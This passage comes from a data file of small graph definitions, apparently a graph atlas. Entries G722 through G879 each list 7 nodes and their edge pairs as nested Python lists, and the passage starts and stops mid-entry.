[1, 4],
[6, 1],
[2, 6],
[3, 2],
[7, 3],
[1, 7],
[1, 5],
[5, 3],
[5, 7]]],
['edgelist',
'G722',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 5],
[7, 2],
[7, 3],
[7, 6]]],
['edgelist',
'G723',
7,
[[1, 4],
[3, 1],
[2, 3],
[4, 2],
[5, 4],
[3, 5],
[6, 5],
[6, 1],
[7, 5],
[7, 2]]],
['edgelist',
'G724',
7,
[[1, 2],
[7, 6],
[3, 4],
[4, 5],
[7, 5],
[1, 6],
[7, 3],
[7, 2],
[5, 3],
[6, 2]]],
['edgelist',
'G725',
7,
[[6, 3],
[7, 6],
[3, 7],
[5, 3],
[1, 5],
[4, 1],
[3, 4],
[2, 1],
[2, 4],
[5, 2]]],
['edgelist',
'G726',
7,
[[4, 5],
[2, 4],
[5, 2],
[1, 5],
[4, 1],
[2, 1],
[3, 2],
[6, 3],
[7, 6],
[3, 7]]],
['edgelist',
'G727',
7,
[[6, 7],
[3, 6],
[7, 3],
[4, 7],
[1, 4],
[5, 1],
[6, 5],
[2, 5],
[4, 2],
[3, 2]]],
['edgelist',
'G728',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 1],
[7, 2],
[7, 6],
[5, 3]]],
['edgelist',
'G729',
7,
[[2, 1],
[3, 2],
[4, 3],
[1, 4],
[6, 1],
[2, 6],
[5, 6],
[7, 5],
[4, 7],
[3, 7]]],
['edgelist',
'G730',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[5, 2],
[3, 6],
[7, 1],
[4, 7]]],
['edgelist',
'G731',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[1, 3],
[2, 6]]],
['edgelist',
'G732',
7,
[[1, 2],
[3, 5],
[1, 3],
[3, 2],
[4, 2],
[4, 3],
[5, 2],
[6, 2],
[6, 3],
[6, 4],
[1, 4]]],
['edgelist',
'G733',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 1],
[5, 6]]],
['edgelist',
'G734',
7,
[[1, 2],
[2, 3],
[3, 4],
[5, 6],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 4],
[1, 3]]],
['edgelist',
'G735',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[6, 4],
[3, 6],
[2, 1],
[5, 2],
[6, 2]]],
['edgelist',
'G736',
7,
[[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[3, 7],
[4, 5],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G737',
7,
[[4, 7],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[7, 6],
[3, 7],
[6, 2],
[1, 4],
[2, 7],
[1, 2]]],
['edgelist',
'G738',
7,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[1, 2],
[3, 1],
[4, 3]]],
['edgelist',
'G739',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[3, 5],
[6, 3],
[2, 6],
[2, 5],
[1, 4]]],
['edgelist',
'G740',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 5],
[7, 5]]],
['edgelist',
'G741',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 4],
[7, 5]]],
['edgelist',
'G742',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 3],
[5, 7]]],
['edgelist',
'G743',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[3, 6],
[7, 3]]],
['edgelist',
'G744',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 3],
[1, 7]]],
['edgelist',
'G745',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[2, 3],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[4, 5],
[7, 6]]],
['edgelist',
'G746',
7,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[5, 6],
[2, 1],
[5, 7]]],
['edgelist',
'G747',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[6, 5],
[4, 6],
[2, 6],
[2, 7]]],
['edgelist',
'G748',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[6, 5],
[4, 6],
[2, 6],
[7, 5]]],
['edgelist',
'G749',
7,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[5, 6],
[2, 1],
[2, 7]]],
['edgelist',
'G750',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[5, 1],
[3, 5],
[3, 7]]],
['edgelist',
'G751',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[6, 5],
[4, 6],
[2, 6],
[6, 7]]],
['edgelist',
'G752',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[3, 5],
[6, 3],
[3, 7]]],
['edgelist',
'G753',
7,
[[2, 1],
[5, 2],
[1, 5],
[6, 1],
[5, 6],
[4, 5],
[2, 4],
[6, 2],
[3, 4],
[2, 3],
[7, 2]]],
['edgelist',
'G754',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[3, 5],
[6, 3],
[4, 7]]],
['edgelist',
'G755',
7,
[[2, 1],
[5, 2],
[1, 5],
[6, 1],
[5, 6],
[4, 5],
[2, 4],
[6, 2],
[3, 4],
[2, 3],
[7, 5]]],
['edgelist',
'G756',
7,
[[1, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G757',
7,
[[5, 4],
[1, 5],
[2, 1],
[3, 2],
[4, 3],
[1, 6],
[6, 4],
[1, 4],
[2, 6],
[6, 3],
[1, 7]]],
['edgelist',
'G758',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[3, 5],
[6, 3],
[1, 7]]],
['edgelist',
'G759',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[3, 6],
[1, 6],
[3, 1],
[6, 2],
[5, 2],
[2, 7]]],
['edgelist',
'G760',
7,
[[2, 1],
[5, 2],
[1, 5],
[6, 1],
[5, 6],
[4, 5],
[2, 4],
[6, 2],
[3, 4],
[2, 3],
[6, 7]]],
['edgelist',
'G761',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[6, 5],
[4, 6],
[2, 6],
[1, 7]]],
['edgelist',
'G762',
7,
[[1, 2],
[3, 5],
[1, 3],
[5, 6],
[4, 2],
[4, 3],
[5, 2],
[6, 2],
[6, 3],
[6, 4],
[3, 7]]],
['edgelist',
'G763',
7,
[[2, 1],
[5, 2],
[1, 5],
[6, 1],
[5, 6],
[4, 5],
[2, 4],
[6, 2],
[3, 4],
[2, 3],
[4, 7]]],
['edgelist',
'G764',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[3, 6],
[1, 6],
[3, 1],
[6, 2],
[5, 2],
[3, 7]]],
['edgelist',
'G765',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[3, 5],
[6, 3],
[6, 7]]],
['edgelist',
'G766',
7,
[[5, 4],
[1, 5],
[2, 1],
[3, 2],
[4, 3],
[1, 6],
[6, 4],
[1, 4],
[2, 6],
[6, 3],
[6, 7]]],
['edgelist',
'G767',
7,
[[1, 2],
[3, 5],
[1, 3],
[5, 6],
[4, 2],
[4, 3],
[5, 2],
[6, 2],
[6, 3],
[6, 4],
[6, 7]]],
['edgelist',
'G768',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 5],
[6, 7]]],
['edgelist',
'G769',
7,
[[5, 4],
[1, 5],
[2, 1],
[3, 2],
[4, 3],
[1, 6],
[6, 4],
[1, 4],
[2, 6],
[6, 3],
[2, 7]]],
['edgelist',
'G770',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[3, 6],
[1, 6],
[3, 1],
[6, 2],
[5, 2],
[5, 7]]],
['edgelist',
'G771',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[3, 6],
[1, 6],
[3, 1],
[6, 2],
[5, 2],
[6, 7]]],
['edgelist',
'G772',
7,
[[1, 2],
[3, 5],
[1, 3],
[5, 6],
[4, 2],
[4, 3],
[5, 2],
[6, 2],
[6, 3],
[6, 4],
[5, 7]]],
['edgelist',
'G773',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[5, 1],
[3, 5],
[2, 7]]],
['edgelist',
'G774',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[7, 6],
[7, 3]]],
['edgelist',
'G775',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 2],
[6, 3],
[6, 4],
[6, 5],
[6, 7]]],
['edgelist',
'G776',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[3, 5],
[1, 3],
[2, 4],
[6, 2],
[2, 7]]],
['edgelist',
'G777',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 2],
[6, 3],
[6, 4],
[6, 5],
[2, 7]]],
['edgelist',
'G778',
7,
[[2, 1],
[5, 2],
[1, 5],
[6, 1],
[5, 6],
[4, 5],
[2, 4],
[6, 2],
[3, 4],
[2, 3],
[3, 7]]],
['edgelist',
'G779',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[3, 5],
[6, 3],
[2, 7]]],
['edgelist',
'G780',
7,
[[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[6, 7]]],
['edgelist',
'G781',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[5, 2],
[6, 4],
[3, 6],
[2, 1],
[2, 7]]],
['edgelist',
'G782',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[3, 5],
[1, 3],
[2, 4],
[6, 2],
[6, 7]]],
['edgelist',
'G783',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[3, 5],
[1, 3],
[2, 4],
[6, 2],
[7, 4]]],
['edgelist',
'G784',
7,
[[5, 4],
[1, 5],
[2, 1],
[3, 2],
[4, 3],
[1, 6],
[6, 4],
[1, 4],
[2, 6],
[6, 3],
[5, 7]]],
['edgelist',
'G785',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[3, 6],
[1, 6],
[3, 1],
[6, 2],
[5, 2],
[7, 4]]],
['edgelist',
'G786',
7,
[[4, 5],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[3, 5],
[6, 2],
[4, 3],
[1, 4],
[2, 7]]],
['edgelist',
'G787',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[5, 2],
[6, 4],
[3, 6],
[2, 1],
[7, 3]]],
['edgelist',
'G788',
7,
[[1, 2],
[3, 5],
[1, 3],
[5, 6],
[4, 2],
[4, 3],
[5, 2],
[6, 2],
[6, 3],
[6, 4],
[1, 7]]],
['edgelist',
'G789',
7,
[[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6]]],
['edgelist',
'G790',
7,
[[7, 6],
[1, 7],
[6, 1],
[2, 6],
[7, 2],
[3, 7],
[6, 3],
[4, 6],
[7, 4],
[5, 7],
[6, 5]]],
['edgelist',
'G791',
7,
[[1, 2],
[3, 1],
[4, 3],
[5, 4],
[2, 5],
[3, 2],
[6, 2],
[3, 6],
[7, 3],
[2, 7],
[4, 2]]],
['edgelist',
'G792',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 2],
[4, 6],
[7, 2],
[5, 7],
[2, 5],
[4, 2]]],
['edgelist',
'G793',
7,
[[2, 5],
[3, 4],
[5, 3],
[1, 7],
[5, 6],
[7, 6],
[4, 2],
[7, 5],
[4, 1],
[4, 7],
[5, 4]]],
['edgelist',
'G794',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[5, 3],
[7, 5],
[3, 7],
[6, 3],
[1, 3]]],
['edgelist',
'G795',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[5, 1],
[4, 1],
[3, 1],
[7, 1],
[4, 7]]],
['edgelist',
'G796',
7,
[[1, 2],
[3, 1],
[6, 3],
[7, 6],
[3, 7],
[2, 3],
[5, 2],
[3, 5],
[4, 3],
[5, 4],
[4, 2]]],
['edgelist',
'G797',
7,
[[5, 6],
[2, 5],
[3, 2],
[4, 3],
[7, 4],
[6, 7],
[3, 6],
[5, 3],
[4, 6],
[1, 6],
[3, 1]]],
['edgelist',
'G798',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[5, 3],
[6, 3],
[6, 1],
[7, 3],
[5, 7],
[6, 5]]],
['edgelist',
'G799',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[7, 2],
[3, 7],
[1, 3],
[7, 1],
[6, 3],
[1, 6]]],
['edgelist',
'G800',
7,
[[1, 6],
[7, 1],
[2, 7],
[6, 2],
[3, 6],
[7, 3],
[5, 4],
[4, 3],
[5, 6],
[7, 5],
[7, 6]]],
['edgelist',
'G801',
7,
[[1, 6],
[7, 1],
[2, 7],
[6, 2],
[3, 6],
[7, 3],
[4, 7],
[6, 4],
[5, 6],
[7, 5],
[5, 4]]],
['edgelist',
'G802',
7,
[[1, 6],
[1, 7],
[2, 3],
[2, 7],
[3, 5],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G803',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[1, 3],
[3, 5],
[6, 3],
[5, 6],
[7, 6],
[7, 1]]],
['edgelist',
'G804',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[6, 7],
[1, 7],
[5, 3],
[1, 5],
[3, 1],
[7, 5]]],
['edgelist',
'G805',
7,
[[1, 2],
[3, 1],
[4, 3],
[5, 4],
[2, 5],
[6, 2],
[6, 3],
[7, 2],
[3, 7],
[5, 3],
[6, 5]]],
['edgelist',
'G806',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[6, 2],
[3, 6],
[5, 3],
[7, 3],
[5, 7]]],
['edgelist',
'G807',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 1],
[7, 5],
[7, 3],
[1, 3],
[5, 1]]],
['edgelist',
'G808',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[4, 2],
[6, 4],
[5, 6],
[2, 5],
[7, 6],
[7, 2]]],
['edgelist',
'G809',
7,
[[1, 5],
[4, 1],
[5, 4],
[3, 5],
[4, 3],
[2, 4],
[3, 2],
[5, 2],
[6, 3],
[7, 6],
[3, 7]]],
['edgelist',
'G810',
7,
[[1, 6],
[1, 7],
[2, 5],
[2, 7],
[3, 4],
[3, 6],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G811',
7,
[[1, 2],
[5, 1],
[6, 5],
[7, 6],
[4, 7],
[3, 4],
[2, 3],
[5, 2],
[3, 5],
[6, 3],
[2, 6]]],
['edgelist',
'G812',
7,
[[1, 5],
[4, 1],
[5, 4],
[3, 5],
[7, 3],
[2, 7],
[6, 2],
[3, 6],
[4, 3],
[2, 4],
[5, 2]]],
['edgelist',
'G813',
7,
[[1, 2],
[7, 6],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 1],
[7, 2],
[7, 3],
[7, 4],
[7, 5]]],
['edgelist',
'G814',
7,
[[5, 2],
[1, 5],
[2, 1],
[4, 2],
[1, 4],
[6, 2],
[7, 6],
[2, 7],
[3, 2],
[6, 3],
[7, 3]]],
['edgelist',
'G815',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[5, 4],
[6, 5],
[7, 6],
[5, 7]]],
['edgelist',
'G816',
7,
[[2, 1],
[3, 2],
[4, 3],
[5, 4],
[1, 5],
[3, 1],
[6, 3],
[7, 6],
[4, 7],
[7, 1],
[1, 6]]],
['edgelist',
'G817',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[1, 3],
[5, 1],
[7, 5],
[1, 7],
[4, 7]]],
['edgelist',
'G818',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[3, 1],
[6, 3],
[7, 6],
[5, 7],
[1, 6],
[7, 1]]],
['edgelist',
'G819',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 1],
[3, 7],
[4, 7],
[1, 4],
[5, 1]]],
['edgelist',
'G820',
7,
[[5, 7],
[6, 5],
[7, 6],
[4, 7],
[6, 4],
[3, 6],
[4, 3],
[6, 1],
[7, 1],
[2, 1],
[3, 2]]],
['edgelist',
'G821',
7,
[[3, 1],
[5, 3],
[6, 5],
[4, 6],
[2, 4],
[1, 2],
[3, 2],
[4, 3],
[7, 4],
[6, 7],
[5, 4]]],
['edgelist',
'G822',
7,
[[5, 4],
[5, 3],
[2, 5],
[4, 2],
[1, 4],
[2, 1],
[4, 3],
[4, 6],
[3, 6],
[7, 1],
[5, 7]]],
['edgelist',
'G823',
7,
[[1, 2],
[1, 3],
[3, 4],
[6, 2],
[2, 4],
[6, 3],
[7, 4],
[7, 1],
[6, 4],
[5, 6],
[4, 5]]],
['edgelist',
'G824',
7,
[[5, 1],
[2, 5],
[7, 2],
[1, 7],
[4, 1],
[2, 4],
[6, 2],
[1, 6],
[7, 6],
[3, 4],
[1, 3]]],
['edgelist',
'G825',
7,
[[1, 2],
[6, 1],
[5, 6],
[2, 5],
[3, 2],
[4, 3],
[5, 4],
[5, 3],
[7, 5],
[3, 7],
[4, 7]]],
['edgelist',
'G826',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[6, 2],
[4, 6],
[7, 4],
[5, 7],
[6, 7]]],
['edgelist',
'G827',
7,
[[7, 4],
[6, 7],
[3, 6],
[4, 3],
[6, 4],
[5, 6],
[3, 5],
[2, 3],
[6, 2],
[1, 2],
[5, 1]]],
['edgelist',
'G828',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[5, 4],
[6, 2],
[7, 6],
[5, 7]]],
['edgelist',
'G829',
7,
[[1, 5],
[4, 1],
[3, 4],
[6, 3],
[7, 6],
[3, 7],
[5, 3],
[2, 5],
[4, 2],
[2, 1],
[3, 2]]],
['edgelist',
'G830',
7,
[[6, 1],
[1, 2],
[4, 1],
[6, 4],
[3, 6],
[7, 3],
[5, 7],
[6, 5],
[2, 6],
[7, 2],
[4, 7]]],
['edgelist',
'G831',
7,
[[1, 2],
[3, 1],
[4, 3],
[5, 4],
[2, 5],
[3, 2],
[6, 2],
[3, 6],
[7, 5],
[7, 3],
[4, 7]]],
['edgelist',
'G832',
7,
[[4, 3],
[7, 4],
[6, 7],
[1, 6],
[3, 1],
[2, 3],
[1, 2],
[6, 2],
[3, 6],
[5, 3],
[7, 5]]],
['edgelist',
'G833',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[5, 2],
[6, 4],
[6, 2],
[7, 5],
[7, 6],
[4, 7]]],
['edgelist',
'G834',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 4],
[7, 1],
[7, 3],
[7, 4],
[6, 7]]],
['edgelist',
'G835',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[6, 2],
[7, 6],
[5, 7],
[4, 7],
[2, 7]]],
['edgelist',
'G836',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[6, 2],
[7, 6],
[2, 7],
[3, 7],
[5, 3]]],
['edgelist',
'G837',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 4],
[5, 3],
[7, 2],
[7, 5],
[6, 3],
[4, 6]]],
['edgelist',
'G838',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[6, 2],
[7, 2],
[5, 7],
[7, 6],
[3, 7]]],
['edgelist',
'G839',
7,
[[1, 4],
[1, 7],
[2, 3],
[2, 6],
[3, 5],
[3, 7],
[4, 5],
[4, 6],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G840',
7,
[[6, 2],
[7, 6],
[5, 7],
[4, 5],
[3, 4],
[1, 3],
[2, 1],
[6, 1],
[7, 1],
[3, 7],
[5, 3]]],
['edgelist',
'G841',
7,
[[2, 1],
[3, 2],
[4, 3],
[5, 4],
[1, 5],
[6, 3],
[4, 6],
[7, 1],
[7, 6],
[7, 3],
[4, 7]]],
['edgelist',
'G842',
7,
[[1, 4],
[5, 1],
[3, 5],
[4, 3],
[2, 4],
[5, 2],
[6, 2],
[7, 1],
[7, 2],
[6, 4],
[5, 6]]],
['edgelist',
'G843',
7,
[[1, 6],
[1, 7],
[2, 4],
[2, 5],
[3, 4],
[3, 6],
[3, 7],
[4, 5],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G844',
7,
[[1, 3],
[2, 1],
[3, 2],
[1, 4],
[4, 2],
[6, 5],
[6, 4],
[7, 5],
[7, 3],
[7, 1],
[2, 7]]],
['edgelist',
'G845',
7,
[[5, 2],
[6, 5],
[3, 6],
[2, 3],
[1, 2],
[6, 1],
[7, 6],
[4, 7],
[3, 4],
[1, 3],
[5, 1]]],
['edgelist',
'G846',
7,
[[1, 2],
[3, 1],
[4, 3],
[5, 4],
[2, 5],
[7, 2],
[7, 3],
[6, 2],
[4, 6],
[6, 3],
[5, 6]]],
['edgelist',
'G847',
7,
[[1, 6],
[1, 7],
[2, 5],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6]]],
['edgelist',
'G848',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 4],
[7, 5],
[7, 3],
[3, 1],
[5, 1]]],
['edgelist',
'G849',
7,
[[1, 3],
[2, 1],
[3, 2],
[1, 4],
[4, 2],
[6, 5],
[6, 4],
[7, 5],
[7, 3],
[5, 1],
[2, 5]]],
['edgelist',
'G850',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 2],
[6, 3],
[7, 3],
[1, 7],
[2, 7]]],
['edgelist',
'G851',
7,
[[1, 4],
[5, 1],
[2, 5],
[4, 2],
[5, 4],
[1, 2],
[3, 5],
[7, 3],
[6, 7],
[3, 6],
[2, 3]]],
['edgelist',
'G852',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 5],
[6, 3],
[6, 4],
[7, 2],
[7, 6]]],
['edgelist',
'G853',
7,
[[5, 2],
[6, 5],
[3, 6],
[2, 3],
[1, 2],
[5, 1],
[6, 1],
[7, 6],
[4, 7],
[3, 4],
[6, 4]]],
['edgelist',
'G854',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 4],
[5, 3],
[6, 2],
[6, 5],
[7, 6],
[5, 7]]],
['edgelist',
'G855',
7,
[[1, 2],
[2, 3],
[3, 4],
[6, 5],
[1, 5],
[6, 1],
[6, 2],
[6, 3],
[6, 4],
[7, 4],
[7, 5]]],
['edgelist',
'G856',
7,
[[1, 5],
[4, 1],
[2, 4],
[5, 2],
[4, 5],
[6, 2],
[7, 6],
[2, 7],
[3, 2],
[6, 3],
[7, 3]]],
['edgelist',
'G857',
7,
[[5, 2],
[1, 5],
[4, 1],
[3, 6],
[6, 5],
[7, 6],
[3, 7],
[2, 3],
[4, 2],
[7, 4],
[3, 4]]],
['edgelist',
'G858',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 3],
[6, 5],
[6, 4],
[7, 1],
[7, 6],
[4, 7]]],
['edgelist',
'G859',
7,
[[6, 3],
[3, 5],
[6, 4],
[5, 2],
[6, 5],
[1, 2],
[4, 1],
[1, 3],
[7, 3],
[7, 4],
[1, 7]]],
['edgelist',
'G860',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 5],
[6, 3],
[6, 4],
[7, 2],
[1, 7]]],
['edgelist',
'G861',
7,
[[1, 4],
[1, 5],
[2, 3],
[2, 6],
[2, 7],
[3, 5],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G862',
7,
[[5, 1],
[4, 5],
[6, 4],
[1, 6],
[2, 1],
[3, 2],
[4, 3],
[5, 2],
[6, 3],
[7, 5],
[6, 7]]],
['edgelist',
'G863',
7,
[[3, 4],
[5, 3],
[1, 5],
[6, 1],
[2, 6],
[5, 2],
[4, 5],
[6, 4],
[2, 1],
[7, 6],
[7, 3]]],
['edgelist',
'G864',
7,
[[5, 2],
[1, 5],
[4, 1],
[5, 4],
[6, 5],
[7, 6],
[3, 7],
[2, 3],
[4, 2],
[7, 4],
[3, 6]]],
['edgelist',
'G865',
7,
[[1, 4],
[5, 1],
[3, 5],
[4, 3],
[2, 4],
[1, 2],
[7, 1],
[6, 7],
[3, 6],
[2, 6],
[5, 2]]],
['edgelist',
'G866',
7,
[[1, 4],
[1, 5],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[3, 7],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G867',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 4],
[5, 3],
[6, 2],
[6, 5],
[7, 2],
[6, 7]]],
['edgelist',
'G868',
7,
[[5, 2],
[6, 5],
[7, 6],
[4, 7],
[3, 4],
[2, 3],
[1, 2],
[6, 1],
[5, 1],
[6, 3],
[7, 3]]],
['edgelist',
'G869',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[5, 3],
[4, 6],
[5, 6],
[4, 1],
[7, 6],
[7, 2]]],
['edgelist',
'G870',
7,
[[1, 5],
[2, 1],
[5, 2],
[4, 5],
[3, 4],
[2, 3],
[7, 2],
[6, 7],
[4, 6],
[6, 5],
[3, 7]]],
['edgelist',
'G871',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[6, 2],
[5, 3],
[7, 3],
[4, 7],
[5, 7]]],
['edgelist',
'G872',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 3],
[2, 7],
[6, 3],
[5, 2],
[1, 4]]],
['edgelist',
'G873',
7,
[[1, 4],
[1, 5],
[2, 3],
[2, 6],
[2, 7],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G874',
7,
[[1, 2],
[2, 3],
[3, 4],
[6, 5],
[1, 5],
[6, 4],
[6, 2],
[7, 4],
[7, 5],
[5, 3],
[1, 4]]],
['edgelist',
'G875',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 4],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 7],
[4, 7],
[5, 6]]],
['edgelist',
'G876',
7,
[[5, 4],
[3, 5],
[4, 3],
[1, 4],
[3, 2],
[6, 5],
[6, 1],
[7, 5],
[7, 2],
[2, 6],
[1, 7]]],
['edgelist',
'G877',
7,
[[7, 5],
[4, 7],
[2, 4],
[5, 2],
[1, 5],
[3, 1],
[4, 3],
[1, 2],
[6, 1],
[7, 6],
[6, 3]]],
['edgelist',
'G878',
7,
[[7, 2],
[3, 7],
[2, 3],
[1, 2],
[4, 1],
[5, 4],
[6, 5],
[4, 6],
[3, 1],
[5, 1],
[6, 7]]],
['edgelist',
'G879',
7,
[[1, 2],
[2, 3],
[3, 4],
[5, 6],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
